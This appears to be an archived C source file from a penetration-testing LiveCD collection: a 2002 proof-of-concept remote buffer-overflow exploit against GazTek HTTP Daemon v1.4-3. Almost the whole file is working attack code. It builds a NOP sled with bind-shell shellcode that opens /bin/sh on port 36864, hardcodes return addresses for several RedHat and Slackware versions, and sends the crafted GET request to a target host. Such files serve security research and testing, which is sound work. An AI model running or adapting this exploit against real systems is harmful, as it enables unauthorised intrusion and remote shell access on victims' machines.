home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / gaztek / PRPghttpd.c

< prev

Wrap

C/C++ Source or Header  |  2005-02-12  |  9KB  |  295 lines

---

1. /* PRPghttpd.c
2.  
3.          This program is free software; you can redistribute it and/or
4.          modify it under the terms of the GNU General Public License
5.          as published by the Free Software Foundation; either version 2
6.          of the License, or (at your option) any later version.
7.  
8.          This program is distributed in the hope that it will be useful,
9.          but WITHOUT ANY WARRANTY; without even the implied warranty of
10.          MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
11.          GNU General Public License for more details.
12.  
13.          You should have received a copy of the GNU General Public License
14.          along with this program; if not, write to the Free Software
15.          Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
16.          02111-1307, USA.
17.  
18.          -
19.  
20.          PYR/\MID, Research Project
21.          Author: flea
22.          Date: October 7, 2002
23.          Members: Apm, flea, thread
24.  
25.          Proof of Concept Remote Exploit for GazTek HTTP Daemon v1.4-3
26.  
27.          Works on:
28.          i386 Redhat 7.2
29.          i386 Redhat 7.3
30.          i386 Slackware 8.1
31.  
32. */
33.  
34. #include <stdio.h>
35. #include <stdlib.h>
36. #include <string.h>
37. #include <unistd.h>
38. #include <sys/types.h>
39. #include <sys/socket.h>
40. #include <netinet/in.h>
41. #include <arpa/inet.h>
42.  
43. #define NOP                     0x90
44. #define MIN_BUFFER_SIZE                  198
45. #define MAX_IP_LENGHT                  15
46. #define GAZTEK_PORT                  80
47. #define BIND_PORT               36864
48.  
49. void synops(char *argv[]);
50. int main(int argc, char *argv[]);
51. void get_ban(char *ban_addr);
52.  
53. #define ARCH_NUMBER                  4
54.  
55. struct arch {
56.          int id;
57.          char *os;
58.          long addr;
59.          int adjusted_buf;
60. } architectures[] = {
61.                            {0, "GazTek HTTP Daemon v1.4/i386 RedHat 7.3 Linux", 0xbfffb9c0, 0},
62.                            {1, "GazTek HTTP Daemon v1.4/i386 RedHat 7.3 Linux", 0xbfffb6b0, 0},
63.                                 {2, "GazTek HTTP Daemon v1.4/i386 RedHat 7.2 Linux", 0xbfffb658, -1},
64.                           {3, "GazTek HTTP Daemon v1.4/i386 Slackware 8.1", 0xbfffb50c, -32}
65.                        };
66.  
67. char bindshell[] =
68.         "\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c"
69.         "\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\xc6\x46"
70.         "\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89"
71.         "\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c"
72.         "\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66"
73.         "\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x80\x86"
74.         "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f"
75.         "\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x4b\x0c"
76.         "\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
77.  
78. void synops(char *argv[])
79. {
80.          int i;
81.  
82.          printf("PYR/\\MID, Research Project 02\n");
83.         printf("GazTek HTTP Daemon v1.4 remote exploit, by flea.\n");
84.         printf("SYNOPS: %s [-b <banner>] -d <arch> <ip> <remote>\n\n", argv[0]);
85.         printf("<ip>            - ip address to check lenght\n");
86.         printf("<remote>        - remote target ip addr\n");
87.         printf("<arch>          - remote architecture id\n");
88.         printf("<banner>        - ip addr to check banner\n\n");
89.          printf("Architectures id:\n");
90.  
91.         for(i=0; i<ARCH_NUMBER; i++)
92.                  printf("\t%d, %s, 0x%x\n", architectures[i].id, architectures[i].os, architectures[i].addr);
93.  
94.          exit(0);
95. }
96.  
97. void get_ban(char *ban_addr)
98. {
99.          int i, sock_fd;
100.          char *read_buf, *read_buf_toked, *ptr;
101.          struct sockaddr_in target;
102.  
103.          if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 1)
104.          {
105.                   printf("socket() error.\n");
106.                   exit(-1);
107.          }
108.  
109.          target.sin_family = AF_INET;
110.          target.sin_port = htons(GAZTEK_PORT);
111.  
112.          if((target.sin_addr.s_addr = inet_addr(ban_addr)) == -1)
113.          {
114.                   printf("\"%s\" is an invalid ip address.\n", ban_addr);
115.                   exit(-1);
116.          }
117.  
118.          bzero(&(target.sin_zero), 8);
119.  
120.          if((connect(sock_fd, (struct sockaddr *)&target, sizeof(target))) == -1)
121.          {
122.                   printf("connect() error.\n");
123.                   exit(-1);
124.          }
125.  
126.          if((write(sock_fd, "HEAD HTTP /\n\n", 13)) == -1)
127.          {
128.                   printf("write() error.\n");
129.                   exit(-1);
130.          }
131.  
132.          read_buf = malloc(256);
133.          read_buf_toked = malloc(256);
134.  
135.          if((read(sock_fd, read_buf, 256)) == -1)
136.          {
137.                   printf("read() error.\n");
138.                   exit(-1);
139.          }
140.  
141.          strcpy(read_buf_toked, read_buf);
142.          ptr = strstr(read_buf_toked, "Server");
143.          ptr = strtok(ptr, "\n");
144.  
145.          printf("%s\n\n", ptr);
146.  
147.          printf("****** FULL HEADERS ******\n");
148.          ptr = strtok(read_buf, "\n");
149.  
150.          for(i=0; i<4; i++)
151.          {
152.                   ptr = strtok(NULL, "\n");
153.                   printf("%s\n", ptr);
154.          }
155.          printf("****** FULL HEADERS ******\n");
156.          exit(0);
157. }
158.  
159. main(int argc, char *argv[])
160. {
161.          int c, c_size, ip_lenght, arch_id, sock_fd, errflg=0, ban_chk=0, exp_flg=0;
162.          char *addr, *get_buf, *get_buf_str;
163.          long ret;
164.  
165.          extern char *optarg;
166.          extern int optind, optopt;
167.  
168.          struct sockaddr_in target;
169.  
170.          if(argc == 1)
171.                   synops(argv);
172.  
173.          while((c = getopt(argc, argv, "b:d:")) != -1)
174.          {
175.                   switch(c)
176.                   {
177.                            case 'b':
178.                                     addr = malloc(strlen(optarg));
179.                                     strcpy(addr, optarg);
180.                                     ban_chk++;
181.                                     break;
182.                            case 'd':
183.                                     if(!(argv[optind]))
184.                                              errflg++;
185.                                     if(!(argv[optind+1]))
186.                                              errflg++;
187.                                     if(errflg == 0)
188.                                     {
189.                                              if((arch_id = atoi(optarg)) < 0 || (arch_id = atoi(optarg)) > (ARCH_NUMBER-1))
190.                                              {
191.                                                       printf("Invalid architecture id.\n");
192.                                                       exit(-1);
193.                                              }
194.  
195.                                              if((inet_addr(argv[optind])) != -1)
196.                                                       ip_lenght = strlen(argv[optind+1]);
197.                                              else
198.                                              {
199.                                                       printf("\"%s\" is an invalid ip address.\n", argv[optind]);
200.                                                       exit(-1);
201.                                              }
202.                                              addr = malloc(strlen(argv[optind+1]));
203.                                              strcpy(addr, argv[optind+1]+1);
204.                                              exp_flg++;
205.                                     }
206.  
207.                                     break;
208.                            case ':':
209.                                     errflg++;
210.                                     break;
211.                            case '?':
212.                                     errflg++;
213.                   }
214.          }
215.  
216.          if(errflg > 0)
217.                   synops(argv);
218.  
219.          /* check banner info */
220.          if(ban_chk > 0)
221.                   get_ban(addr);
222.  
223.          if(!(exp_flg))
224.                   synops(argv);
225. /*
226.         Buffer Size Craft Relation
227.         min string size                    = 192 bytes
228.         string "GET _" size                =   4 bytes
229.         max log ip size "255.255.255.255"  =  15 bytes
230.         string "\n\n" size                 =   2 bytes
231.                                            = 198 bytes
232.                                                         */
233.          /* dont count with GET request and newline bytes */
234.          c_size = ((MIN_BUFFER_SIZE+15-ip_lenght-4-2)+(architectures[arch_id].adjusted_buf));
235.          /* NULL string byte */
236.          c_size = c_size+1;
237.  
238.          /* builds crafted buffer */
239.          get_buf = malloc(c_size);
240.          /* counts with all constants sizes */
241.          get_buf_str = malloc((c_size+4+2));
242.  
243.          memset(get_buf, NOP, c_size);
244.          memcpy(get_buf+(c_size-1-4-strlen(bindshell)), bindshell, strlen(bindshell));
245.          *(long*)&get_buf[c_size-4-1] = architectures[arch_id].addr;
246.          get_buf[c_size-1] = '\0';
247.  
248.          /* final buffer, now just inject on connection */
249.          sprintf(get_buf_str,"GET %s\n\n", get_buf);
250.  
251.          /* infos */
252.          printf("target: %s\n", addr);
253.          printf("arch id: %d, %s, 0x%x\n", architectures[arch_id].id, architectures[arch_id].os, architectures[arch_id].addr);
254.          printf("ip size: %d bytes\n", ip_lenght);
255.          printf("Adjust: %d bytes\n", architectures[arch_id].adjusted_buf);
256.          printf("buffer size: %d bytes\n", strlen(get_buf_str));
257.          printf("bind shellcode size: %d bytes\n", strlen(bindshell));
258.          printf("bind shell tcp port: %d\n", BIND_PORT);
259.          printf("Injecting code at 0x%x...\n", architectures[arch_id].addr);
260.  
261.          /* start socket() */
262.  
263.         if((sock_fd = socket(AF_INET, SOCK_STREAM, 0)) < 1)
264.         {
265.                 printf("socket() error.\n");
266.                 exit(-1);
267.         }
268.  
269.         target.sin_family = AF_INET;
270.         target.sin_port = htons(GAZTEK_PORT);
271.  
272.         if((target.sin_addr.s_addr = inet_addr(addr)) == -1)
273.         {
274.                 printf("\"%s\" is an invalid ip address.\n", addr);
275.                 exit(-1);
276.         }
277.  
278.         bzero(&(target.sin_zero), 8);
279.  
280.         if((connect(sock_fd, (struct sockaddr *)&target, sizeof(target))) == -1)
281.          {
282.                 printf("connect() error.\n");
283.                 exit(-1);
284.         }
285.  
286.         if((write(sock_fd, get_buf_str, strlen(get_buf_str))) == -1)
287.         {
288.                 printf("write() error.\n");
289.                 exit(-1);
290.         }
291.  
292.          printf("Done!\n");
293.  
294. return 0;
295. }